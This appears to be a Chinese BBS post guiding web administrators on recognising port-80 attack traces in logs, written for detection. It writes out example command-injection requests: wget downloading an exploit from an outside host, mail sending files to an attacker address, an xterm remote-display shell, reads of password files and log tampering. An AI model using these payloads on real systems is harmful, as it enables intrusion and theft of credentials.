80端口web服务攻击痕迹.txt

BBS的精华之处

被用来下载后门程序，tftp是unix和nt下的命令，用来下载文件。一些IIS蠕虫通过tft 
p来复制自身传播病毒到其他的主机 
Examples: 
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2 
/Phantasmp.c| http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security 
.net/Phantasmp.c; 
"cat" 命令 
这个命令用来查看文件内容，常用来读重要的信息，比如配置文件，密码文件，信用卡 
文件和你能够想到的文件 
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd| h 
ttp://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd; 
"echo" 命令 
这个命令常用于写数据到文件中，比如“index.html” 
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20"fc-#kiwis% 
20was%20here"%20>>%200day.txt| http://host/cgi-bin/bad.cgi?doh=echo%20"fc-#k 
iwis%20was%20here"%20>>%200day.txt; 
"ps" 命令 
列出当前运行的进程，告诉攻击者远程主机运行了那些软件，以便从中得到一些安全问 
题的主意，获得进一步的权限 
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux| http:// 
host/cgi-bin/bad.cgi?doh=ps%20-aux; 
"kill and killall" 命令 
在unix系统这个命令用于杀掉进程，一个攻击者可以用这个命令来停止系统服务和程序 
，同时可以擦掉攻击者的痕迹，一些exploit会产生很多的子进程 
Examples: http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200| http://host/ 
cgi-bin/bad.cgi?doh=kill%20-9%200; 
"uname" 命令 
这个命令告诉攻击者远程机器的名字，一些时候，通过这个命令知道web站点位于哪个i 
sp，也许是攻击者曾今访问过的。通常uname -a来请求，这些都将记录在日志文件中 
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a| http:/ 
/host/cgi-bin/bad.cgi?doh=uname%20-a; 
"cc, gcc, perl, python, etc..." 编译/解释命令 
攻击者通过wget或者tftp下载exploit，并用cc,gcc这样的编译程序进行编译成可执行程 
序，进一步获得特权 
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c| 
http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337; 
如果你查看日志中发现有“perl” python”这些说明可能攻击者下载远程的perl ,pyt 
hon脚本程序，并试图本地获得特权 
"mail" 命令 
攻击者通常用这个命令将系统的一些重要文件发到攻击者自己的信箱，也肯能是进行邮 
件炸弹的攻击 
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@好 
好学习cnhonker.org%20<<%20/etc/motd| http://host/cgi-bin/bad.cgi?doh=mail%20 
steele@jersey.whitehouse.gov%20<</tmp/wu-2.6.1.c; 
"xterm/其他X 应用程序" 命令 
xterm 常用来获得远程机器上的shell,如果你在你的日志中发现这些符号，可要认真分 
析你的系统，可能已经存在安全裂口。注意在日志中查找"%20-display%20" 这个字符， 
这种痕迹通常是在远程机子上启动xterm或者X应用程序 
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../usr/X11R6/bin/xterm%20 
-display%20192.168.22.1| http://host/cgi-bin/bad.cgi?doh=Xeyes%20-display%20 
192.168.22.1; 
"chown, chmod, chgrp, chsh, etc..." 等命令 
在unix系统这些命令允许改变文件的许可权限 
chown = 允许设置文件的拥有者chmod = 允许设置文件的许可权限chgrp = 允许改变组 
对文件的拥有权限chsh = 允许改变用户的shell 
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod%20777%20inde 
x.html| http://host/cgi-bin/bad.cgi?doh=chmod%20777%20index.html; http://hos 
t/cgi-bin/bad.cgi?doh=../../../../bin/chown%20zeno%20/etc/master.passwd| htt 
p://host/cgi-bin/bad.cgi?doh=chsh%20/bin/sh; http://host/cgi-bin/bad.cgi?doh 
=../../../../bin/chgrp%20nobody%20/etc/shadow| 
"/etc/passwd" 文件 
这是系统的密码文件，一般是shadow过的，并且不允许看到加密的口令，不过对攻击者 
来说，可以知道那些是有效的用户，以及系统的绝对路径，站点名称等信息，由于通常 
被shadow过的，所以对攻击者，通常会查看/etc/shadow 文件 
"/etc/master.passwd" 
这个文件是BSD系统的密码文件，包含有加密过的密码，这个文件对root帐号仅仅是只读 
的，而一些不熟练的攻击者会打开他试图读取里面的内容.，如果web站点是以root权限 
运行的，那么对攻击者来说，就能够读取里面的内容，对系统管理员很多问题也将接踵 
而来 
"/etc/shadow" 
包含有加密过的系统口令，对root帐号同样只读，和/et/master.passwd差不多 
"/etc/motd" 
当用户登陆进unix系统中出现的信息，就在这个"Message of the Day" 文件中 ，它提 
供重要的系统信息和管理员对用户的一些设置，那些是希望用户看到的，那些不是，还 
含有系统的版本信息，攻击者通常查看此文件，了解是什么系统在运行，对攻击者来说 
，下一步是搜索这种类型的系统的exploit，进一步获得系统特权 
"/etc/hosts" 
该文件提供ip地址和网络信息，攻击者可以了解更多的系统中的网络设置 
"/usr/local/apache/conf/httpd.conf" 
这是个Apache web服务器的配置文件，攻击者可以了解诸如cgi,ssi是否可访问等信息 
"/etc/inetd.conf" 
这是inetd服务的配置文件，攻击者可以了解远程机器上的那些服务启动，是否用了wra 
pper进行访问控制，如果发现wrapper 运行着，攻击者下一步会检查"/etc/hosts.allo 
w" 和 "/etc/hosts.deny",文件，并可能会更改里面的一些设置，获得特权 
".htpasswd, .htaccess, and .htgroup" 
这些文件通常在web站点用于对用户身份进行认证，攻击者会查看这些文件，并获得用户 
名和密码，密码文件.htpasswd被加密过，通过一些简单的破解程序进行解密，使攻击者 
访问站点中被保护的区域（通常用户用和用户名相同的密码，以至攻击者可以以其他帐 
号进行访问） 
"access_log and error_log" 
这些是apache服务器的日志记录文件，攻击者常会查看这些文件，看那些请求被记录， 
那些和其他请求不同的地方 
通常，攻击者会修改这些日志文件，比如他自身的地址信息，攻击者通过80端口突破你 
的系统，而你的系统又没有进行备份的工作，也没有其他记录程序记录系统状况，这将 
使入侵检测工作变的很困难 
"[drive-letter]:winntrepairsam._ or [drive-letter]:winntrepairsam" 
Windows NT系统中的密码文件，如果远程命令不可以执行，通常攻击者会请求这些文件 
，然后通过"l0pht crack"之类的密码破解工具进行破解，如果攻击者试图攻击adminis 
trator的密码文件，如果成功那么远程机器将被攻击者得到控制权 
[溢出 分析] 
我不会在这篇文章中说过多的关于溢出的话题，我将举列说明那些现象和痕迹值得注意 
和特别关注的地方，缓冲攻击常被攻击者通过编码转换和其他途径来达到不易发现 
下面是个简单的列子 
Example: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA A 
AAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA 
AAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA A 
AAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAA 
AAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAA 
AAAAAAAAAAAAAAAAAA AA 
这个列子展示了攻击者对某个应用程序发送很多的A字符，来测试程序的缓冲溢出，缓冲 
溢出可以获得远程主机的命令执行权限，如果是具有setuid和属主为root的程序，通过 
溢出，可以得到整个系统的访问权限，如果不是setuid之类的程序，那么溢出仅仅是得 
到运行该web站点的用户权限 
这里并不能讲述所有的情况，不过你应该有定时的检查你的日志文件，如果那一天突然 
发现很多的请求，而平时的请求不多，那么说明你正遭受到溢出的攻击，当然也可能是 
一种新的网络蠕虫的攻击 
[编码转换] 
以上提及的所有攻击请求，攻击者通常知晓IDS系统常会机械的检查这些请求，通常是攻 
击者会用编码转换工具将所请求的内容转化成16进制的格式，导致IDS会忽略这些请求， 
我们熟知的CGI漏洞扫描工具Whisker就是个很好的列子。如果你在查看日志的时候发现 
大量的16进制和不常见的一些字符，那么可能攻击者尝试用一些方式对你的系统进行攻 
击 
一种快速发现的方法是，将你的日志文件中的那些16进制的请求，拷贝到你的浏览器中 

，通过浏览器可以转化成正确的请求，并显示出来请求的内容，如果你不敢冒这个危险 
，简单的man ASCII，可以提供给你正确的编码。 
[结论] 
这篇文章不可能覆盖所有的80端口的攻击，但是以上已经列举了大部分普遍的攻击方式 
，同时告诉你如何检查你的日志文件，和怎样加如一些IDS的规则，写她的目的在于给w 
eb系统管理员应该关注什么提供一个好的思路，同时，我也希望这篇文章可以帮助给we 
b程序的开发者写出更好的web程序 
  
-- 
welcome to: http://ir.hit.edu.cn/~car/ 
  
看来尘世间最远的距离还是天涯海角！